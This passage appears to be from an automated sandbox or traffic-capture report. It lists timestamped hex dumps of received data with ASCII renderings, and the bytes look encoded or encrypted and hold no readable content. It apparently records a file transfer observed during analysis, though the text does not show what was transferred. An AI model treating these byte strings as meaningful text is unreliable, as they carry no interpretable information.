                                                                                                                                                                        2021-10-28 02:56:05 UTC51INData Raw: bd c3 8d c3 b0 c3 b7 c3 97 c2 9d c2 92 c2 99 c2 b2 c2 a9 c3 bb c3 97 c3 9d c3 b5 c3 bc c2 9f c3 90 c3 a8 c3 96 c3 bc c3 9a c3 b8 c3 b0 c2 82 c2 b8 c2 bd c3 a6 c3 a8 c2 ae c3 89 c3 a4 c3 81 c3 88 c3 98 c3 82 c3 9f c3 83 c3 80 c3 ad c2 b7 c2 86 c2 89 c3 9b c2 af c3 b9 c3 95 c3 9c c2 a8 c3 b0 c3 88 c3 b6 c3 8c c3 ba 27 11 63 77 7d 0c 4a 5c 33 2c 32 02 51 4d 52 59 3b 0c 10 56 4c 04 2f 35 31 00 3a 0c 5e 38 2b 32 0f 32 2b 40 70 3b 62 71 21 13 73 31 12 24 1e 12 0f 08 70 43 4a 1a 70 05 38 21 16 31 0a 2a 0e 12 40 6d 1f 07 33 50 7a 50 70 47 66 45 72 71 7c 48 7f 42 50 0e 3e 56 66 5d 7f 45 5b 7a 57 73 1d 59 4a 50 38 38 13 46 41 63 52 70 4a 7c 5c 47 55 49 52 56 0a 32 0d 67 47 62 52 70 27 4f 4f 53 5c 51 c2 a7 c3 83 c3 a3 c2 87 c3 9e c2 81 c2 a2 c2 a7 c2 a5 c2 b3 c2 a2
                                                                                                                                                                        Data Ascii: 'cw}J\3,2QMRY;VL/51:^8+22+@p;bq!s1$pCJp8!1*@m3PzPpGfErq|HBP>Vf]E[zWsYJP88FAcRpJ|\GUIRV2gGbRp'OOS\Q
                                                                                                                                                                        2021-10-28 02:56:05 UTC52INData Raw: 0a 06 59 48 6e 49 70 5c 45 3f c2 bb c2 bb c2 99 c2 a7 c2 b5 c3 b1 c3 9d c3 b8 c2 9d c2 ae c2 81 c2 a9 c2 a8 c3 9c c2 ab c2 b7 c2 b4 c3 9a c2 bf c2 bc c2 af c2 9d c3 83 c3 b4 c2 b6 c3 99 c2 a0 c2 b1 c2 90 c2 b5 c2 bf c2 a4 c2 a6 c2 8a c2 9c c2 ae c2 81 c3 91 c3 b9 c3 9a c2 ac c2 9e c2 a1 c2 8a c2 88 c2 91 c2 ae c2 8c c2 8c c2 9b c2 ab c3 a6 c2 94 c3 8d c3 a8 c2 b4 c2 b4 c2 89 c2 b1 c2 99 c2 96 c3 bb c2 b6 c2 9c c3 8c c3 95 c3 a3 c3 af c3 99 c2 8e c2 90 c2 bd c3 a4 c3 ad c3 b8 c2 97 c3 92 c3 a0 c3 9b c3 ba c3 9b c3 8a c3 89 c3 be c3 8a c2 b5 c2 b5 c2 a3 c3 8d c3 a8 c3 8f c2 84 c3 b5 c3 8c c3 b7 c3 a4 c3 80 c2 bd c3 a9 c2 b6 c3 92 c2 81 c2 81 c2 ae c2 97 c3 a9 c3 ba c3 8c c3 b5 c3 8d c3 bb c2 af c3 8b c3 81 c3 ab c2 a6 c2 b6 c2 b3 c2 8a c2 89 c3 97 c2 a3 c3
                                                                                                                                                                        Data Ascii: YHnIp\E?
                                                                                                                                                                        2021-10-28 02:56:05 UTC53INData Raw: 9b c3 be c3 90 c3 b8 c3 9d c3 b1 c2 ad c2 a2 c3 8d c3 8c c3 b2 c3 bd c3 99 c3 ad c2 ae c2 9e c2 88 c3 ae c3 80 c3 aa c3 b6 07 2f 09 38 02 4e 33 28 1b 00 69 5f 1b 2e 54 26 05 13 37 05 2a 30 01 17 34 44 1b 6c 6c 21 56 10 42 67 6e 1c 7d 15 24 24 73 37 37 55 10 15 37 09 07 15 2b 0c 21 0b 21 18 25 5e 7f 63 3f 0d 34 1e 69 6b 70 68 7d 06 40 65 0b 3b 3a 31 63 01 41 6d 7a 5b 79 60 7a 67 78 70 68 5f 09 3c 6f 69 7c 75 6c 47 69 26 38 60 26 2e 4f 11 69 6f 49 5c 5d 36 6e 51 65 51 54 43 70 57 75 10 19 19 69 41 6e 56 c2 9e c2 ac c2 97 c2 a1 c2 af c3 83 c2 b1 c2 a2 c3 93 c2 89 c3 b9 c3 9f c2 99 c2 b1 c2 81 c3 97 c2 92 c2 bd c2 98 c2 ad c2 a8 c3 96 c2 bb c2 b8 c2 84 c3 8b c3 84 c2 98 c2 8b c2 bd c2 94 c2 b8 c2 b8 c3 b9 c2 83 c2 98 c2 80 c3 af c2 8f c2 88 c2 bb c2 b3 c3 94
                                                                                                                                                                        Data Ascii: /8N3(i_.T&7*04Dll!VBgn}$$s77U7+!!%^c?4ikph}@e;:1cAmz[y`zgxph_<oi|ulGi&8`&.OioI\]6nQeQTCpWuiAnV
                                                                                                                                                                        2021-10-28 02:56:05 UTC56INData Raw: af c2 af c3 aa c2 80 c3 b0 c3 b4 c2 be c3 88 c3 a6 c2 a5 c2 ba c3 96 c3 ac c3 8f c3 a4 c3 9a c3 89 c2 93 c2 a6 c2 83 c3 b3 c3 87 c2 af c3 9f c3 ba c3 9f c3 99 c3 8e c3 bc c3 8b c3 ba c2 b4 c3 88 46 72 70 04 38 0a 55 00 22 28 31 0e 29 35 1e 21 4a 44 71 33 12 30 10 1e 43 55 2a 2e 08 4b 02 59 50 7b 7c 36 10 7f 66 1d 04 23 1c 6f 1d 00 01 1f 31 53 53 2f 2a 3d 0d 1c 22 32 02 3d 77 65 37 3e 48 15 5e 2a 04 64 64 63 10 72 70 77 76 72 1e 7e 29 2a 50 46 71 19 7e 49 78 4e 66 46 1f 5b 74 5c 04 3a 13 0e 76 47 5c 6b 40 48 61 4c 5a 6b 4c 6c 28 27 08 5c 31 78 29 69 52 6c 4a 47 46 42 59 20 c3 b4 c3 9a c3 b5 c3 ae c2 b3 c3 9f c3 9f c2 88 c3 8e c3 92 c2 ae c2 93 c2 8e c2 91 c2 ae c2 ba c3 ac c3 99 c3 8e c2 bc c2 a8 c2 81 c2 bb c2 9b c2 bb c2 b8 c2 a1 c2 9d c3 9e c2 a3 c2 93
                                                                                                                                                                        Data Ascii: Frp8U"(1)5!JDq30CU*.KYP{|6f#o1SS/*="2=we7>H^*ddcrpwvr~)*PFq~IxNfF[t\:vG\k@HaLZkLl('\1x)iRlJGFBY
                                                                                                                                                                        2021-10-28 02:56:05 UTC60INData Raw: c2 96 c3 82 c2 ab c3 bb c3 b0 c3 b7 c3 9e c3 b7 c3 bc c3 a0 c3 8a c3 bf c3 87 c3 aa c2 ac c2 9c c2 8e c3 a8 c3 82 33 2f 02 2c 11 33 1c 35 57 2e 3f 7b 7c 77 21 4a 04 11 14 3f 10 1d 03 2b 10 3e 09 4d 7b 6f 0b 23 13 0f 22 0c 31 13 31 64 16 24 17 52 4c 67 0c 0d 05 18 0a 0b 12 06 18 05 15 1d 3b 4b 5f 4f 39 0b 61 63 65 7c 76 5c 60 71 4e 63 47 51 19 24 49 4d 72 7b 4c 73 43 6a 73 67 5f 76 63 52 14 01 62 63 46 4c 6e 4f 6e 53 71 50 45 6d 69 6a 19 6b 69 7d 52 5b 7e 57 73 42 53 47 55 72 57 1d 36 34 6b 43 c3 92 c2 bf c2 85 c2 a9 c2 a3 c2 b0 c2 bb c2 b7 c2 b6 c2 84 c2 a4 c3 af c3 97 c3 b2 c2 b1 c3 8a c2 a4 c2 b4 c2 8e c2 ab c2 a7 c2 88 c3 8d c2 83 c2 be c2 be c2 af c3 af c3 87 c3 a2 c2 8c c2 a9 c2 92 c2 a5 c2 bc c2 8e c2 97 c2 9a c3 bf c2 9e c2 90 c2 8d c2 9c c3 8b c3
                                                                                                                                                                        Data Ascii: 3/,35W.?{|w!J?+>M{o#"11d$RLg;K_O9ace|v\`qNcGQ$IMr{LsCjsg_vcRbcFLnOnSqPEmijki}R[~WsBSGUrW64kC
                                                                                                                                                                        2021-10-28 02:56:05 UTC64INData Raw: 83 c3 b5 c3 bd c3 b0 c3 b3 c3 9c 33 3d 38 18 2e 34 72 4c 77 0d 14 03 50 39 2f 21 07 2d 28 4d 30 20 72 4c 61 0e 17 3a 3e 39 4f 32 18 29 7e 2b 13 32 70 5b 52 06 28 07 0e 26 06 26 05 0c 00 3b 10 00 48 76 46 2d 0e 73 65 09 3c 35 7e 57 1a 44 6b 03 27 5a 54 79 6e 4b 66 41 66 6e 6b 57 19 13 5d 62 10 5d 2a 5e 66 68 76 21 6e 6c 26 4a 76 27 4a 56 16 10 1a 6e 5a 61 5e 71 5e 79 4f 76 2a 75 5c 40 06 07 01 7e 37 37 38 04 42 4d c2 a2 c2 9a c2 9a c3 94 c2 b7 c2 a2 c3 be c3 81 c3 b7 c2 8a c2 ba c2 81 c2 ab c2 86 c2 8c c2 8b c3 95 c2 87 c2 8f c2 b1 c2 94 c2 b2 c3 ae c2 94 c3 a9 c2 9e c2 ba c2 91 c2 bd c2 81 c2 8f c2 be c2 9b c2 a7 c3 a9 c2 82 c2 8b c2 b6 c2 b8 c3 ba c3 8a c2 8c c2 b8 c2 86 c2 8e c2 89 c2 b0 c2 82 c2 87 c2 b7 c2 80 c2 ab c2 9b c2 b9 c3 ac c3 94 c3 82 c2 be
                                                                                                                                                                        Data Ascii: 3=8.4rLwP9/!-(M0 rLa:>9O2)~+2p[R(&&;HvF-se<5~WDk'ZTynKfAfnkW]b]*^fhv!nl&Jv'JVnZa^q^yOv*u\@~778BM
                                                                                                                                                                        2021-10-28 02:56:05 UTC68INData Raw: 05 65 47 17 2b 0e 38 14 06 39 48 2b 32 3b 18 33 05 22 52 59 08 05 0b 1d 36 09 19 6f 06 16 08 0c 17 49 74 44 27 07 37 14 37 11 3e 07 12 01 3c 0c 1b 16 5f 5f 53 52 60 62 56 69 18 75 76 71 46 60 14 30 4f 4f 24 79 65 05 3a 1f 00 60 5a 1e 45 5e 47 19 24 04 43 55 62 3b 5c 6e 44 71 50 57 30 4b 45 15 29 0a 63 32 57 55 5f 45 57 58 40 47 41 2f c2 b1 c3 b8 c3 b9 c3 b5 c2 91 c2 b9 c2 91 c2 a8 c2 90 c2 a7 c2 8b c2 b1 c2 a1 c2 bf c2 86 c2 a3 c2 a5 c3 af c3 8c c3 b6 c3 bd c2 86 c3 9a c3 93 c2 84 c2 92 c2 bc c2 a3 c2 a0 c2 a7 c3 80 c2 b5 c2 81 c3 9f c3 ba c3 9a c2 98 c3 bf c3 aa c3 a3 c3 93 c2 95 c2 9d c3 a0 c3 ac c3 b1 c3 b8 c2 80 c2 ad c2 b8 c3 b6 c3 af c2 aa c2 81 c2 b2 c2 9d c2 b4 c2 99 c2 af c2 be c2 b4 c3 a1 c2 bb c3 b6 c3 b0 c3 84 c2 a2 c2 9f c3 83 c3 97 c3 a4 c3
                                                                                                                                                                        Data Ascii: eG+89H+2;3"RY6oItD'77><__SR`bViuvqF`0OO$ye:`ZE^G$CUb;\nDqPW0KE)c2WU_EWX@GA/
                                                                                                                                                                        2021-10-28 02:56:05 UTC72INData Raw: 15 5e 5d 54 03 10 21 6d 48 18 07 77 19 0a 15 10 1c 75 5c 49 52 64 52 18 4d 68 4c 1b 79 41 64 61 56 25 32 12 46 74 0b 16 47 69 42 74 7a 63 0f 5f 7c 24 1b 39 40 50 7b 45 7f 3f 6e 5e 47 22 44 76 56 18 36 13 78 62 54 50 57 48 58 63 4b 42 27 58 5a 08 22 09 12 c2 b7 c2 a0 c2 90 c2 8c c2 a8 c2 8f c2 b8 c2 b9 c3 8a c2 a5 c2 a5 c2 bb c3 bf c3 bd c3 b8 c2 a0 c2 ad c2 a3 c2 a8 c2 9f c2 98 c2 85 c2 aa c2 aa c2 aa c3 9d c3 8e c2 96 c3 b8 c3 86 c3 a3 c2 8a c3 a4 c2 86 c2 a6 c2 85 c2 ae c2 a0 c3 bb c3 a7 c3 ab c2 af c2 88 c2 a7 c3 aa c3 b7 c3 94 c2 a6 c3 aa c3 a2 c2 89 c2 96 c2 88 c2 82 c3 ab c3 b7 c3 a4 c3 bd c2 ab c2 8e c3 98 c3 a6 c3 81 c2 a1 c3 b6 c3 b0 c3 b0 c3 9d c3 a4 c3 92 c3 87 c3 a2 c3 bc c3 a4 c3 a5 c3 98 c3 85 c2 ae c2 8a c3 98 c3 b3 c2 87 c3 9f c3 86 c3 8e
                                                                                                                                                                        Data Ascii: ^]T!mHwu\IRdRMhLyAdaV%2FtGiBtzc_|$9@P{E?n^G"DvV6xbTPWHXcKB'XZ"
                                                                                                                                                                        2021-10-28 02:56:05 UTC77INData Raw: 04 37 2c 33 66 6f 7c 60 41 67 72 62 7c 65 5c 41 12 23 03 20 4a 7c 7b 44 57 06 6a 5f 7a 45 61 41 24 17 0c 13 46 4f 5c 45 70 4f 7f 45 58 49 4b 7b 4a 76 23 00 68 5c 78 46 78 53 c2 b6 c2 a2 c2 b7 c2 97 c3 92 c3 8c c2 a0 c3 b5 c3 ab c3 8d c2 9f c2 b7 c3 9d c2 a0 c2 92 c2 a7 c2 b6 c2 a2 c2 bc c2 a5 c2 92 c2 b9 c2 b0 c3 a5 c3 bb c3 8d c2 88 c2 a7 c3 8e c2 b3 c2 99 c2 b2 c2 81 c2 9a c2 a7 c2 8a c2 9c c2 92 c2 93 c3 97 c3 9b c3 9b c2 bf c2 97 c3 be c2 89 c2 aa c2 89 c2 b4 c2 a5 c3 b6 c2 a6 c3 b4 c3 bc c2 ba c3 a9 c3 9c c3 8b c2 bd c2 9f c2 9e c2 97 c2 b2 c2 83 c3 9a c3 bd c3 85 c3 a5 c3 aa c3 a1 c3 b3 c2 b7 c2 b8 c2 b3 c3 a6 c3 a4 c3 b9 c2 92 c3 82 c3 b7 c3 b2 c3 a2 c3 ae c3 a9 c3 8d c3 bc c2 94 c2 ae c2 a3 c3 85 c3 9d c3 af c3 bd c3 bf c3 ba c2 87 c3 9a c3 82 c3
                                                                                                                                                                        Data Ascii: 7,3fo|`Agrb|e\A# J|{DWj_zEaA$FO\EpOEXIK{Jv#h\xFxS
                                                                                                                                                                        2021-10-28 02:56:05 UTC81INData Raw: 3a 2b 06 05 46 74 51 42 5e 46 71 54 64 5e 51 61 51 0a 2d 7f 79 46 56 5a 4c 23 49 65 41 4c 28 c2 a7 c2 b4 c3 b2 c3 b5 c3 b0 c2 91 c2 b0 c2 b5 c2 94 c2 85 c2 a6 c2 af c3 8a c2 a1 c2 9a c2 a1 c2 b7 c2 a4 c3 a6 c3 88 c3 a9 c2 95 c2 b1 c2 ba c2 90 c2 96 c2 94 c2 ba c2 a7 c2 98 c2 b8 c2 87 c2 ad c2 98 c3 9c c3 b9 c3 85 c2 91 c2 b5 c3 ab c3 ac c2 8f c2 86 c2 b1 c2 90 c2 96 c2 9e c2 91 c2 a1 c2 94 c3 a1 c3 a6 c3 82 c2 b2 c2 82 c2 95 c2 92 c2 a7 c2 9a c3 a9 c2 9b c2 98 c2 85 c2 92 c3 af c3 9c c3 8b c2 87 c2 98 c3 94 c3 be c3 9e c2 8c c2 ab c2 96 c3 a9 c3 ae c3 a7 c3 b8 c3 ae c3 99 c3 a1 c2 9b c2 a7 c2 a1 c3 b8 c3 b3 c3 bd c3 a3 c3 91 c3 b6 c3 8c c2 9a c2 8a c3 8a c2 88 c3 94 c3 81 c2 b2 c2 93 c2 9a c3 8a c2 ab c3 ac c3 8e c3 8e c3 96 c3 9f c3 8f c3 91 c3 94 c2 b1
                                                                                                                                                                        Data Ascii: :+FtQB^FqTd^QaQ-yFVZL#IeAL(
                                                                                                                                                                        2021-10-28 02:56:05 UTC85INData Raw: 45 03 2b 7d c2 b6 c2 92 c3 8e c3 87 c2 a2 c2 a9 c2 9c c2 bb c2 b3 c2 b9 c2 b4 c2 9a c2 a9 c3 9e c3 9b c3 b1 c2 97 c2 a5 c2 b0 c2 b9 c2 8a c2 b5 c3 84 c2 b0 c2 bd c2 a2 c2 b7 c2 b4 c2 81 c2 94 c3 9a c3 83 c2 b6 c2 99 c2 95 c3 a7 c3 86 c3 b9 c2 84 c2 85 c2 82 c2 9f c2 8b c2 a2 c2 9c c3 a4 c3 9a c3 9a c2 9d c2 94 c2 98 c2 88 c2 bc c2 99 c2 a1 c3 b1 c3 af c2 ad c3 ad c2 8f c2 9c c3 ad c3 8e c3 81 c3 af c2 8c c3 89 c3 a5 c3 a3 c3 b9 c3 b2 c3 a4 c3 b4 c3 b3 c2 94 c3 a3 c3 81 c2 b3 c2 94 c2 b6 c3 8f c2 8b c2 9e c2 97 c3 b2 c3 b9 c3 9c c3 ab c3 a1 c3 a9 c3 a7 c3 ac c3 bb c2 a5 c3 9d c2 a0 c3 b5 c3 9b c3 a8 c3 a9 c3 90 c2 a3 c2 aa c2 ba c3 bf c3 b1 c3 9f c3 a2 c3 99 c2 89 c2 9d c2 a5 c2 99 c2 b4 c3 b8 c3 94 c3 af c3 9f c3 87 c3 aa c3 84 c3 83 c3 85 c2 ab c3 8d c2
                                                                                                                                                                        Data Ascii: E+}
                                                                                                                                                                        2021-10-28 02:56:05 UTC88INData Raw: 81 c3 95 c3 85 c3 85 c2 ad c2 95 c2 af c2 80 c3 87 c2 95 c2 a5 c2 89 c3 ae c3 b3 c3 af c3 ac c3 99 c3 84 c2 97 c2 a5 c3 9d c3 b5 c3 9d c3 a1 c2 aa c3 a1 c3 84 c3 b1 c3 ac c3 a3 c3 95 c3 bc c3 89 c3 94 c2 a1 c2 ad c3 8d c3 a5 c3 a9 c3 9f c3 94 c3 bb c3 8e c2 86 c3 b7 c3 b9 c3 95 c2 b1 c3 91 c2 b6 c2 9d c2 96 c3 bd c3 95 c2 b8 c3 8e c3 a0 c3 8b c3 a5 c3 95 c3 b0 c3 92 c2 b2 c2 ba c3 94 c2 8d c2 b0 c2 8c c3 b7 c3 89 c3 9c c3 80 c3 85 c3 bc c3 9c 22 1a 1a 34 56 20 6e 52 7a 26 39 30 53 13 3e 18 23 3d 24 15 3e 35 76 67 61 36 3a 1f 3e 03 3e 10 14 0f 14 25 0c 05 46 51 74 23 15 26 68 4f 77 25 0e 0c 38 1e 1b 28 5e 52 7c 3e 1e 19 16 23 1e 28 6a 6b 74 4b 15 67 0f 1d 4b 4c 54 41 6d 41 4c 45 66 6c 59 7d 7b 17 1f 27 26 75 76 6f 40 51 66 7d 53 5d 58 3d 52 52 18 32 62 7f
                                                                                                                                                                        Data Ascii: "4V nRz&90S>#=$>5vga6:>>%FQt#&hOw%8(^R|>#(jktKgKLTAmALEflY}{'&uvo@Qf}S]X=RR2b
                                                                                                                                                                        2021-10-28 02:56:05 UTC92INData Raw: c2 b7 c3 96 c3 b8 c3 93 c3 ab c2 ba c3 a0 c3 af c3 b9 c3 a5 c3 ba c3 9b c3 a6 c3 b9 c2 a8 c2 8a c2 a5 c2 a1 c3 89 c2 8f c3 b4 c3 bd c2 9e c3 95 c3 aa c3 a7 c3 bf c2 9d c3 b3 c3 b8 c2 98 c2 a5 c2 92 c3 86 c3 a9 c3 94 c3 84 c2 93 c2 b8 c3 88 c3 91 c3 b3 c3 ba c3 a5 c3 8e c3 88 c2 88 c3 b3 c2 84 c3 9d c3 90 c3 87 c3 9c c3 bb c3 90 c3 98 c3 85 c3 9f c2 b7 c3 96 c3 aa 37 75 5a 72 74 31 33 22 2f 31 3a 38 27 49 03 22 03 6f 65 46 27 07 30 3d 14 31 3d 3d 47 05 36 3f 11 51 3b 55 14 27 04 0d 24 05 20 17 10 6e 2b 26 14 37 37 2f 5d 74 39 18 24 19 09 7d 17 16 04 0b 67 39 41 3c 51 7f 42 59 73 56 06 16 4a 6b 6f 68 12 01 02 52 3d 0f 1e 78 3e 71 56 79 5b 79 64 73 55 11 12 19 45 20 66 5d 0e 45 60 55 6f 7b 66 4b 45 01 02 09 5a 64 5f 29 7f 7b 70 45 64 65 7b 2a c3 86 c3 b8 c3
                                                                                                                                                                        Data Ascii: 7uZrt13"/1:8'I"oeF'0=1==G6?Q;U'$ n+&77/]t9$}g9A<QBYsVJkohR=x>qVy[ydsUE f]E`Uo{fKEZd_){pEde{*
                                                                                                                                                                        2021-10-28 02:56:05 UTC96INData Raw: aa c3 9b c3 b3 c3 b8 c2 95 c3 90 c3 81 c3 bd c2 90 c3 96 c3 ba c3 af c2 bb c2 af c2 af c2 b7 c3 92 c3 94 c3 99 c3 b8 c3 bd c3 92 c3 96 c3 b3 c3 91 c3 be c3 85 c3 84 c2 83 c2 b6 c2 93 c3 81 c3 8d c3 84 c3 83 c3 ac c3 97 c3 b3 c3 81 c3 b6 c3 85 c2 af c3 9e c3 8f c2 8b c2 8a c2 89 c3 aa 2c 05 28 1f 0f 01 32 29 3a 27 2d 2c 74 0f 6b 08 26 4a 3e 1f 38 1f 2a 2c 32 1c 13 39 19 18 02 76 60 00 04 04 18 74 1d 19 39 21 1d 1e 5c 5e 5c 3a 0c 63 0c 34 1b 14 0d 31 73 20 33 17 3b 3c 22 56 00 63 79 4b 68 68 5b 6c 43 60 69 75 35 3b 04 4d 5d 70 75 7b 6d 7f 74 7d 7e 04 7d 7b 24 19 24 4d 5c 33 4c 64 45 44 5d 62 4e 34 63 29 1a 2f 10 06 2a 39 48 6d 54 27 51 52 4f 54 55 65 18 3b 04 0f c2 b9 c2 97 c3 99 c3 a1 c3 82 c3 89 c2 b3 c2 ba c2 82 c2 81 c2 ae c2 ac c3 b4 c3 8b c3 a8 c2 83
                                                                                                                                                                        Data Ascii: ,(2):'-,tk&J>8*,29v`t9!\^\:c41s 3;<"VcyKhh[lC`iu5;M]pu{mt}~}{$$M\3LdED]bN4c)/*9HmT'QROTUe;
                                                                                                                                                                        2021-10-28 02:56:05 UTC100INData Raw: c3 b9 c3 a2 c3 9a c2 a6 c2 b8 c3 ab c3 bc c3 8b c3 bb c2 86 c2 84 c2 90 c3 bc c3 86 c3 be c3 a1 c3 b3 c3 93 c3 ba c3 8a c3 8d c3 80 c2 a5 c3 96 c2 b3 c2 82 c2 ac c2 89 c2 94 c3 b8 c3 99 c3 86 c3 b1 c3 96 21 0a 29 40 02 2d 21 4f 5e 73 03 46 1c 36 2b 15 36 22 3c 21 3f 01 14 4d 43 6c 6e 5d 2e 38 00 3f 35 1f 7b 17 20 3b 10 47 58 53 05 71 25 34 22 2c 03 6c 0c 11 70 61 00 45 58 47 3d 61 3b 1f 1a 6e 1a 71 44 71 71 6e 5b 46 23 33 5f 77 5c 71 50 72 45 4c 59 71 6d 7e 69 5e 26 18 5b 7b 46 7a 6b 63 74 61 7a 65 62 70 42 21 0f 1b 78 57 7b 41 60 43 7e 4d 49 67 5d 5e 49 7e 1c 03 55 37 47 79 5e 42 c3 9b c2 b5 c2 ac c2 b5 c2 82 c2 af c2 b6 c3 9d c3 93 c3 bc c2 b5 c2 a6 c2 be c2 92 c2 90 c2 af c2 87 c2 b4 c2 b8 c2 a5 c2 9c c2 81 c3 92 c3 b3 c3 83 c3 a8 c3 b7 c2 89 c2 be c2
                                                                                                                                                                        Data Ascii: !)@-!O^sF6+6"<!?MCln].8?5{ ;GXSq%4",lpaEXG=a;nqDqqn[F#3_w\qPrELYqm~i^&[{FzkctazebpB!xW{A`C~MIg]^I~U7Gy^B
                                                                                                                                                                        2021-10-28 02:56:05 UTC104INData Raw: 8c c3 90 c3 90 c3 9a c3 b5 c3 80 c3 81 c2 88 c2 95 c2 8e c3 a6 c3 89 c3 b9 c3 9d c3 b0 c3 95 c3 b4 c3 83 c3 80 c3 8c c3 95 16 41 72 70 76 02 36 1d 29 05 26 05 34 31 3f 24 06 54 62 60 66 12 2a 36 47 13 32 3a 5f 3a 55 2a 04 12 52 59 50 32 11 23 01 37 1a 3b 1c 11 14 34 1f 06 4e 5b 45 34 02 16 19 1d 24 1e 07 3b 7c 11 6f 03 11 3c 36 42 72 66 6a 6d 54 6e 77 6d 04 62 07 71 36 08 2b 23 76 5d 7f 6d 76 51 62 63 6f 72 4f 7c 02 1b 1e 4a 23 41 52 43 4b 6f 44 43 55 55 53 56 0a 2d 16 70 46 79 5f 75 78 71 44 43 5c 78 c2 af c2 9c c3 84 c3 bf c3 be c2 8c c3 82 c2 a5 c2 aa c2 a0 c2 b2 c2 b2 c2 b7 c2 8b c2 a8 c2 87 c2 bf c3 93 c3 9b c3 ab c3 ad c2 ba c2 94 c2 be c2 ba c2 9b c3 82 c2 b9 c2 bf c2 96 c2 bc c2 aa c2 8f c2 bc c3 86 c3 b6 c3 86 c3 95 c2 a4 c2 8a c2 8a c2 8d c2 92
                                                                                                                                                                        Data Ascii: Arpv6)&41?$Tb`f*6G2:_:U*RYP2#7;4N[E4$;|o<6BrfjmTnwmbq6+#v]mvQbcorO|J#ARCKoDCUUSV-pFy_uxqDC\x
                                                                                                                                                                        2021-10-28 02:56:05 UTC109INData Raw: c3 8e c2 a4 c3 90 c2 bf c2 88 c2 a6 c2 81 7e 1f 18 24 71 39 1c 39 34 29 27 24 11 0d 79 08 05 2d 29 2b 3c 2e 4c 2c 1e 52 3f 34 51 15 44 1c 20 64 28 04 1e 27 2f 66 77 1f 2f 0f 6e 5d 4a 55 1c 15 02 1e 3b 1d 14 04 16 0f 22 2f 31 43 7f 40 55 7d 57 6b 5a 61 6d 5a 65 6f 17 63 7c 35 3b 38 22 4c 08 75 73 69 79 0a 64 63 65 0b 69 34 21 34 75 4d 77 49 7a 5c 63 44 54 57 4d 62 5a 09 35 12 74 4d 44 5d 78 5d 54 44 43 49 63 54 3e 3b 38 06 c2 af c3 8c c2 89 c2 a1 c2 be c2 89 c2 8e c2 b3 c2 b3 c2 a3 c3 95 c2 a0 c2 91 c3 a9 c3 b9 c3 ac c2 a2 c2 97 c2 98 c2 b9 c3 ad c2 ae c3 8d c2 b5 c2 83 c2 9e c2 b3 c2 bf c2 81 c3 9b c3 87 c3 bc c2 89 c3 ad c2 87 c2 b1 c2 ac c2 81 c2 9c c2 92 c2 86 c2 9f c2 af c2 85 c2 8a c3 bb c3 bb c3 9d c2 b7 c2 85 c2 90 c2 99 c3 8f c2 86 c2 be c2 87 c2
                                                                                                                                                                        Data Ascii: ~$q994)'$y-)+<.L,R?4QD d('/fw/n]JU;"/1C@U}WkZamZeoc|5;8"Lusiydcei4!4uMwIz\cDTWMbZ5tMD]x]TDCIcT>;8
                                                                                                                                                                        2021-10-28 02:56:05 UTC113INData Raw: 07 29 35 12 18 53 4e 2f 2b 28 30 60 5d 6a 0e 39 18 24 01 04 0a 3f 0e 02 23 0e 11 50 4e 5c 2c 18 0f 04 36 1a 24 09 6a 30 2e 19 2a 31 41 40 0a 2c 39 13 26 70 12 7d 4b 6e 7a 49 7b 49 02 37 5c 4f 17 6c 65 16 5d 62 5f 5f 5e 7a 4a 51 29 20 24 10 7c 7c 65 6c 65 56 5f 5e 3a 45 7b 08 0a 18 6c 58 4c 48 69 21 78 72 5f 37 77 5c 7a 0c 21 0b 0b 58 48 5b 58 c2 b8 c2 9b c2 ba c2 bd c2 a6 c3 81 c3 92 c2 8a c3 b0 c3 bf c3 91 c2 85 c2 8e c3 85 c3 97 c3 b2 c2 ac c2 b5 c2 ac c2 bf c2 b6 c3 91 c2 9a c3 93 c3 b1 c3 a2 c3 b8 c2 a5 c2 8e c2 a7 c2 b4 c2 81 c2 84 c2 a6 c2 97 c2 8f c2 96 c2 8b c2 81 c2 92 c3 98 c3 9f c3 a9 c3 9d c2 be c2 8b c2 84 c2 a3 c2 89 c2 98 c2 82 c2 98 c2 bf c2 9b c2 93 c2 bb c3 a2 c3 93 c3 90 c2 bf c3 a6 c2 97 c2 85 c2 b7 c3 bc c3 ba c3 97 c3 bf c3 ae c3 9e
                                                                                                                                                                        Data Ascii: )5SN/+(0`]j9$?#PN\,6$j0.*1A@,9&p}KnzI{I7\Ole]b__^zJQ) $||eleV_^:E{lXLHi!xr_7w\z!XH[X
                                                                                                                                                                        2021-10-28 02:56:05 UTC117INData Raw: 09 0b 10 27 28 19 12 15 6f 12 2e 53 57 47 31 03 19 1f 3c 6a 35 3d 12 7c 42 6b 4f 37 1c 34 36 63 7d 6c 6d 73 56 75 70 6d 14 05 5f 2b 22 0e 58 55 10 00 27 67 78 63 72 7d 24 6d 26 0a 1f 07 58 75 52 43 74 4f 6b 58 42 5d 5e 56 47 03 02 36 01 75 5e 53 76 57 5a 5f 65 6b c2 a3 c2 a0 c2 a4 c3 96 c3 91 c3 b3 c2 a9 c2 b7 c2 b3 c2 8d c2 94 c2 ab c2 9b c2 b9 c3 97 c2 b9 c2 96 c2 bd c2 b4 c3 87 c3 a4 c3 ac c2 b9 c3 92 c2 a2 c2 a3 c2 84 c2 a1 c2 8b c2 a8 c2 b2 c2 a9 c2 a5 c2 85 c3 bd c3 93 c3 86 c3 91 c2 b2 c2 b6 c2 8a c2 84 c2 8e c2 97 c2 97 c2 b0 c2 92 c2 85 c2 aa c2 98 c2 b7 c3 83 c3 87 c3 87 c2 b1 c2 87 c2 b2 c2 94 c2 8e c2 8a c2 8a c2 87 c3 be c2 b4 c3 b8 c3 a2 c3 ba c2 95 c2 a3 c2 b7 c3 ba c3 b7 c3 82 c3 ae c3 86 c3 b7 c3 96 c3 b1 c3 b5 c3 98 c3 97 c3 ba c3 8c c2
                                                                                                                                                                        Data Ascii: '(o.SWG1<j5=|BkO746c}lmsVupm_+"XU'gxcr}$m&XuRCtOkXB]^VG6u^SvWZ_ek
